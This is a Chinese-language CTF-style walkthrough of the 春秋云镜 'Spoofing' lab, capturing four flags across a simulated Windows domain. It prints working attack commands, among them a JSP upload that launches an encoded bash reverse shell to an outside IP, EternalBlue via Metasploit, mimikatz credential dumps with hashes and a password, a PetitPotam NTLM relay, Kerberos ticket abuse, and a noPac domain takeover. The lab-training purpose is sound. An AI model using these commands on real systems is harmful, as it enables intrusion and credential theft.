fffffilm's learning

春秋云镜-Spoofing

  1. 春秋云镜-Spoofing
    1. flag01
    2. flag02
    3. flag03
    4. flag04

渗透

春秋云镜-Spoofing

flag01

fscan梭一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
fscan -h 39.99.139.193

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.99.139.193:8080 open
39.99.139.193:22 open
39.99.139.193:8009 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://39.99.139.193:8080 code:200 len:7091   title:后台管理

8080说是后台管理,其实什么东西都没有。还有个8009端口,看到的时候就感觉是个tomcat。

image-20250306203100356

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
python dirsearch.py -u http://39.99.139.193/ -e *
D:\Program Files\dirsearch-master\dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25
Wordlist size: 15000

Output: D:\Program Files\dirsearch-master\reports\http_39.99.139.193\__25-03-05_20-52-45.txt

Target: http://39.99.139.193/

[20:52:45] Starting:

Cannot connect to: 39.99.139.193

Task Completed

D:\Program Files\dirsearch-master>python dirsearch.py -u http://39.99.139.193:8080/ -e *
D:\Program Files\dirsearch-master\dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25
Wordlist size: 15000

Output: D:\Program Files\dirsearch-master\reports\http_39.99.139.193_8080\__25-03-05_20-53-00.txt

Target: http://39.99.139.193:8080/

[20:53:00] Starting:
[20:53:01] 302 -    0B  - /js  ->  /js/
[20:53:06] 200 -  114B  - /404.html
[20:53:07] 400 -  795B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[20:53:07] 400 -  795B  - /a%5c.aspx
[20:53:25] 200 -    7KB - /console.html
[20:53:26] 302 -    0B  - /css  ->  /css/
[20:53:27] 302 -    0B  - /data  ->  /data/
[20:53:28] 302 -    0B  - /docs  ->  /docs/
[20:53:28] 404 -  750B  - /docs/html/developer/ch02.html
[20:53:28] 404 -  731B  - /docs/changelog.txt
[20:53:28] 404 -  749B  - /docs/html/admin/ch03s07.html
[20:53:28] 404 -  749B  - /docs/html/admin/ch01s04.html
[20:53:28] 404 -  747B  - /docs/html/admin/index.html
[20:53:28] 404 -  733B  - /docs/export-demo.xml
[20:53:28] 404 -  737B  - /docs/html/index.html
[20:53:28] 404 -  753B  - /docs/html/developer/ch03s15.html
[20:53:28] 404 -  732B  - /docs/CHANGELOG.html
[20:53:28] 404 -  746B  - /docs/html/admin/ch01.html
[20:53:28] 404 -  729B  - /docs/_build/
[20:53:28] 404 -  730B  - /docs/updating.txt
[20:53:28] 404 -  733B  - /docs/maintenance.txt
[20:53:28] 404 -  730B  - /docs/swagger.json
[20:53:28] 200 -   17KB - /docs/
[20:53:28] 302 -    0B  - /download  ->  /download/
[20:53:28] 200 -  132B  - /download/
[20:53:30] 404 -  781B  - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[20:53:30] 404 -  746B  - /examples/servlet/SnoopServlet
[20:53:30] 200 -    1KB - /examples/websocket/index.xhtml
[20:53:30] 302 -    0B  - /examples  ->  /examples/
[20:53:30] 200 - 1010B  - /examples/servlets/servlet/RequestHeaderExample
[20:53:30] 200 -   14KB - /examples/jsp/index.html
[20:53:30] 200 -    1KB - /examples/
[20:53:30] 200 -  689B  - /examples/jsp/snp/snoop.jsp
[20:53:30] 200 -    6KB - /examples/servlets/index.html
[20:53:30] 200 -  658B  - /examples/servlets/servlet/CookieExample
[20:53:34] 403 -    3KB - /host-manager/html
[20:53:34] 403 -    3KB - /host-manager/
[20:53:34] 302 -    0B  - /images  ->  /images/
[20:53:37] 302 -    0B  - /lib  ->  /lib/
[20:53:40] 302 -    0B  - /manager  ->  /manager/
[20:53:40] 403 -    3KB - /manager/status/all
[20:53:40] 403 -    3KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage
[20:53:40] 403 -    3KB - /manager/admin.asp
[20:53:40] 403 -    3KB - /manager/jmxproxy/?get=BEANNAME&att=MYATTRIBUTE&key=MYKEY
[20:53:40] 403 -    3KB - /manager/html/
[20:53:40] 403 -    3KB - /manager/jmxproxy/?invoke=BEANNAME&op=METHODNAME&ps=COMMASEPARATEDPARAMETERS
[20:53:40] 403 -    3KB - /manager/login
[20:53:40] 403 -    3KB - /manager/
[20:53:40] 403 -    3KB - /manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=
[20:53:40] 403 -    3KB - /manager/jmxproxy/?qry=STUFF
[20:53:40] 403 -    3KB - /manager/jmxproxy/?set=BEANNAME&att=MYATTRIBUTE&val=NEWVALUE
[20:53:40] 403 -    3KB - /manager/jmxproxy
[20:53:40] 403 -    3KB - /manager/login.asp
[20:53:40] 403 -    3KB - /manager/html
[20:53:40] 403 -    3KB - /manager/VERSION
[20:54:00] 403 -    0B  - /upload
[20:54:00] 403 -    0B  - /upload/2.php
[20:54:00] 403 -    0B  - /upload/b_user.xls
[20:54:00] 403 -    0B  - /upload/1.php
[20:54:00] 403 -    0B  - /upload/b_user.csv
[20:54:00] 403 -    0B  - /upload/
[20:54:00] 403 -    0B  - /upload/loginIxje.php
[20:54:00] 403 -    0B  - /upload/test.php
[20:54:00] 403 -    0B  - /upload/test.txt
[20:54:00] 403 -    0B  - /upload/upload.php
[20:54:00] 200 -    9KB - /user.html

的确是的

image-20250305205428143

发现这个版本的tomcat有个CVE-2020-1938漏洞,可以任意文件读取和文件包含

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
 python3 ajpShooter.py http://39.99.139.193:8080 8009  /WEB-INF/web.xml read

       _    _         __ _                 _            
      /_\  (_)_ __   / _\ |__   ___   ___ | |_ ___ _ __ 
     //_\\ | | '_ \  \ \| '_ \ / _ \ / _ \| __/ _ \ '__|
    /  _  \| | |_) | _\ \ | | | (_) | (_) | ||  __/ |   
    \_/ \_// | .__/  \__/_| |_|\___/ \___/ \__\___|_|   
         |__/|_|                                        
                                                00theway,just for test
    

[<] 200 200
[<] Accept-Ranges: bytes
[<] ETag: W/"2489-1670857638305"
[<] Last-Modified: Mon, 12 Dec 2022 15:07:18 GMT
[<] Content-Type: application/xml
[<] Content-Length: 2489

<!DOCTYPE web-app PUBLIC
 "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
 "http://java.sun.com/dtd/web-app_2_3.dtd" >

<web-app>
  <display-name>Archetype Created Web Application</display-name>

  <security-constraint>
    <display-name>Tomcat Server Configuration Security Constraint</display-name>
    <web-resource-collection>
      <web-resource-name>Protected Area</web-resource-name>
      <url-pattern>/upload/*</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <role-name>admin</role-name>
    </auth-constraint>
  </security-constraint>

  <error-page>
    <error-code>404</error-code>
    <location>/404.html</location>
  </error-page>

  <error-page>
    <error-code>403</error-code>
    <location>/error.html</location>
  </error-page>

  <error-page>
    <exception-type>java.lang.Throwable</exception-type>
    <location>/error.html</location>
  </error-page>

  <servlet>
    <servlet-name>HelloServlet</servlet-name>
    <servlet-class>com.example.HelloServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>HelloServlet</servlet-name>
    <url-pattern>/HelloServlet</url-pattern>
  </servlet-mapping>

  <servlet>
    <display-name>LoginServlet</display-name>
    <servlet-name>LoginServlet</servlet-name>
    <servlet-class>com.example.LoginServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>LoginServlet</servlet-name>
    <url-pattern>/LoginServlet</url-pattern>
  </servlet-mapping>

  <servlet>
    <display-name>RegisterServlet</display-name>
    <servlet-name>RegisterServlet</servlet-name>
    <servlet-class>com.example.RegisterServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>RegisterServlet</servlet-name>
    <url-pattern>/RegisterServlet</url-pattern>
  </servlet-mapping>

  <servlet>
    <display-name>UploadTestServlet</display-name>
    <servlet-name>UploadTestServlet</servlet-name>
    <servlet-class>com.example.UploadTestServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>UploadTestServlet</servlet-name>
    <url-pattern>/UploadServlet</url-pattern>
  </servlet-mapping>

  <servlet>
    <display-name>DownloadFileServlet</display-name>
    <servlet-name>DownloadFileServlet</servlet-name>
    <servlet-class>com.example.DownloadFileServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>DownloadFileServlet</servlet-name>
    <url-pattern>/DownloadServlet</url-pattern>
  </servlet-mapping>
</web-app>

发现一个UploadServlet,如果能任意文件上传,再配合上文件包含,就可以实现rce了

1
2
3
4
5
6
7
8
9
10
<%
    java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTYuMjM4LjIzMy41NS8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
    out.print("</pre>");
%>

image-20250305205955886

上传之后给了具体路径。

1
python3 ajpShooter.py http://39.99.139.193:8080 8009 /upload/4e1503eabe787f7ecf92dcadfe190f49/20250305085946656.txt eval

image-20250305210919664

flag01: flag{cf4cd202-1c88-4fc7-8126-1acfcd04781f}

flag02

fscan扫一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
172.22.11.76:8080 open
172.22.11.45:445 open
172.22.11.26:445 open
172.22.11.6:445 open
172.22.11.26:139 open
172.22.11.45:139 open
172.22.11.6:139 open
172.22.11.26:135 open
172.22.11.45:135 open
172.22.11.6:135 open
172.22.11.76:22 open
172.22.11.6:88 open
172.22.11.76:8009 open
[*] NetBios: 172.22.11.6     [+]DC XIAORANG\XIAORANG-DC     
[*] NetInfo:
[*]172.22.11.26
   [->]XR-LCM3AE8B
   [->]172.22.11.26
[*] NetInfo:
[*]172.22.11.6
   [->]XIAORANG-DC
   [->]172.22.11.6
[*] NetBios: 172.22.11.45    XR-DESKTOP.xiaorang.lab             Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
[+] 172.22.11.45        MS17-010        (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios: 172.22.11.26    XIAORANG\XR-LCM3AE8B           
[*] WebTitle: http://172.22.11.76:8080  code:200 len:7091   title:后台管理

看看有哪些目标

172.22.11.6 DC

172.22.11.26 XIAORANG\XR-LCM3AE8B

172.22.11.76 外网

172.22.11.45 Windows Server 2008 R2(MS17-010

45存在永恒之蓝漏洞,先梭了再说

1
2
3
4
5
proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 172.22.11.45
run

直接拿flag

image-20250306204618071

flag02: flag{cd715209-e4f4-4b84-b6f8-d0498b5256fd}

flag03

抓下哈希

1
2
load kiwi
creds_all

得到机器账号和yangmei用户密码的ntlm哈希,以及yangmei的明文密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
meterpreter > load kiwi
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
meterpreter > creds_all
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username     Domain    NTLM                              SHA1
--------     ------    ----                              ----
XR-DESKTOP$  XIAORANG  d605f55adc8cf205980c365336efe895  5218e5dac784a294d070f182f137f5e5ab3115dc
yangmei      XIAORANG  25e42ef4cc0ab6a8ff9e3edbbda91841  6b2838f81b57faed5d860adaf9401b0edb269a6f

wdigest credentials
===================

Username     Domain    Password
--------     ------    --------
(null)       (null)    (null)
XR-DESKTOP$  XIAORANG  ae f2 db 0c 4c 73 d5 65 bf 23 da 1b 89 d3 76 7f eb ab 39 b1 a6 4e 2a 39 a5 c4 0c da 97 69 ed ad 1e 96 8e b8 fc 3b b6 f7 af e8 a2 06 ce b4 3
                       6 05 dc 51 12 ae 53 c5 6e 08 b2 c5 54 ad ab 52 41 1a c0 8a 91 46 8f 57 28 67 58 88 63 12 0a e7 25 95 bc 27 ce e0 3d 6d d6 5e 28 f4 c8 c5 75
                        da 14 fa 55 4f ac 47 47 cc 46 11 56 e8 b1 1e 41 1a 50 c8 10 f1 01 09 bd 78 98 53 b8 53 47 63 ed 82 10 d2 de 13 32 c2 e2 60 03 f4 f7 af ee
                       ed 28 ae 7b a2 e6 bf fe 0a 11 46 7a 92 ad 67 a6 e7 d8 9a 39 c3 ca ec 54 a7 d7 10 69 2e fd 34 0b 0c ca 97 2e a4 9e 9c 87 9d 7c 48 7d 81 f8 2
                       9 cc d4 1e a3 d6 4c 43 bd cb 4b c7 cd 75 1d f5 c1 0a 63 6a 18 ac 31 5c f6 a0 e4 4a 43 6d 9b 79 98 3d da 6a 43 a2 54 16 1c df d3 ea 5b 53 d5
                        6e 05 7a 67 fd 62 ae 02
yangmei      XIAORANG  xrihGHgoNZQ

kerberos credentials
====================

Username     Domain        Password
--------     ------        --------
(null)       (null)        (null)
xr-desktop$  XIAORANG.LAB  ae f2 db 0c 4c 73 d5 65 bf 23 da 1b 89 d3 76 7f eb ab 39 b1 a6 4e 2a 39 a5 c4 0c da 97 69 ed ad 1e 96 8e b8 fc 3b b6 f7 af e8 a2 06 ce
                           b4 36 05 dc 51 12 ae 53 c5 6e 08 b2 c5 54 ad ab 52 41 1a c0 8a 91 46 8f 57 28 67 58 88 63 12 0a e7 25 95 bc 27 ce e0 3d 6d d6 5e 28 f4
                           c8 c5 75 da 14 fa 55 4f ac 47 47 cc 46 11 56 e8 b1 1e 41 1a 50 c8 10 f1 01 09 bd 78 98 53 b8 53 47 63 ed 82 10 d2 de 13 32 c2 e2 60 03
                           f4 f7 af ee ed 28 ae 7b a2 e6 bf fe 0a 11 46 7a 92 ad 67 a6 e7 d8 9a 39 c3 ca ec 54 a7 d7 10 69 2e fd 34 0b 0c ca 97 2e a4 9e 9c 87 9d
                           7c 48 7d 81 f8 29 cc d4 1e a3 d6 4c 43 bd cb 4b c7 cd 75 1d f5 c1 0a 63 6a 18 ac 31 5c f6 a0 e4 4a 43 6d 9b 79 98 3d da 6a 43 a2 54 16
                           1c df d3 ea 5b 53 d5 6e 05 7a 67 fd 62 ae 02
xr-desktop$  XIAORANG.LAB  (null)
yangmei      XIAORANG.LAB  xrihGHgoNZQ

扫描一下有什么服务

1
proxychains crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M webdav 2>/dev/null

image-20250306205243696

这里一开始一用就报错,换了这个才好CrackMapExec/cme/modules/petitpotam.py

1
proxychains -q crackmapexec smb 172.22.11.0/24 -u 'yangmei' -p 'xrihGHgoNZQ' -M petitpotam

image-20250307152708174

现在的思路是:使用无ADCS + Petitpotam + ntlm中继打法

用petitpotam触发存在漏洞且开启了webclient服务的目标,利用petitpotam触发目标访问我们的http中继服务,目标将会使用webclient携带ntlm认证访问我们的中继,并且将其认证中继到ldap,获取到机器账户的身份,以机器账户的身份修改其自身的msDS-AllowedToActOnBehalfOfOtherIdentity属性,配置到XR-LCM3AE8B.xiaorang.lab的RBCD。

但是有个条件是:默认情况下, WebClient 仅对本地内部网 (Local Intranet) 或受信任的站点 (Trusted Sites) 列表中的目标自动使用当前用户凭据进行 NTLM 认证

我们要把中继(172.22.11.76)的80转发到我们kali的80端口

先在外网靶机(tomcat)上运行

1
socat tcp-listen:80,reuseaddr,fork tcp:vpsip:8848

在vps上运行

1
./frps -c ./tmp_frps.ini

tmp_frps.ini

1
2
3
4
5
6
7
[common]
bind_port = 7099

[tcp_1200]
type = tcp
local_ip = 127.0.0.1 
local_port = 8848

在本地kali上运行

1
./frpc -c ./tmp_frpc.ini

tmp_frpc.ini

1
2
3
4
5
6
7
8
9
[common]
server_addr = vpsip
server_port = 7099
 
[plugin_socks6]
type = tcp
remote_port = 8848
local_port = 80
local_ip = 127.0.0.1

image-20250307135138554

成功收到连接。

image-20250307135120483

开启中继

1
proxychains -q impacket-ntlmrelayx -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access

image-20250307140234462

接着使用Petitpotam触发XR-LCM3AE8B认证到172.22.11.76,这里中继的作用其实就是修改了机器账户的msDS-AllowedToActOnBehalfOfOtherIdentity

1
proxychains -q python3 PetitPotam.py -u yangmei -p xrihGHgoNZQ -d xiaorang.lab ubuntu@80/webdav 172.22.11.26

image-20250307140216031

把XR-LCM3AE8B.xiaorang.lab的ip加到hosts里

现在就可以申请银票据了(这里如果重开了靶机的话记得重新抓一下XR-LCM3AE8B机器的ntlm哈希

1
proxychains impacket-getST -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate administrator -hashes :12dc53c0708954250b0123f9a2602f44 xiaorang.lab/XR-Desktop\$ -dc-ip 172.22.11.6

运行之后得到一个administrator@cifs_XR-LCM3AE8B.xiaorang.lab@XIAORANG.LAB.ccache

导入票据

1
export KRB5CCNAME=administrator@cifs_XR-LCM3AE8B.xiaorang.lab@XIAORANG.LAB.ccache

现在可以无密码连接了(psexec.py和ccache文件得在同一个目录

1
proxychains -q python3 psexec.py xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26 -codec gbk

image-20250307142535571

flag03: flag{2f44096c-18fe-413c-8cdb-c7be5da0a4f8}

flag04

发现还有一个MA_Admin组

1
net group /domain

image-20250307143916823

1
net group "MA_Admin" /domain

存在zhanghui成员

image-20250307143934329

加个账号rdp上去

1
2
net user fffffilm Password@973 /add
net localgroup administrators fffffilm /add

传mimikaze抓哈希

1
2
privilege::debug
sekurlsa::logonpasswords

得到zhanghui的哈希。

1
2
3
4
5
* Username : zhanghui
* Domain   : XIAORANG
* NTLM     : 1232126b24cdf8c9bd2f788a9d7c7ed1
* SHA1     : f3b66ff457185cdf5df6d0a085dd8935e226ba65
* DPAPI    : 4bfe751ae03dc1517cfb688adc506154

因为zhanghui是MA_Admin组内成员,对computer能够创建对象,能向域中添加机器账户,所以能打noPac。Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 

1
proxychains -q python3 noPac.py xiaorang.lab/zhanghui -hashes ':1232126b24cdf8c9bd2f788a9d7c7ed1' -dc-ip 172.22.11.6 --impersonate Administrator -create-child -use-ldap -shell

image-20250307145035070

flag04: flag{6f346099-4b13-4c55-bcb0-260addbd59ba}

参考文章

春秋云境·Spoofing – fushulingのblog

【内网渗透】最保姆级的春秋云镜Spoofing打靶笔记-CSDN博客

春秋云镜 Spoofing writeup - Zer0peach can’t think

春秋云镜-【仿真场景】Spoofing writeup - 渗透测试中心 - 博客园

渗透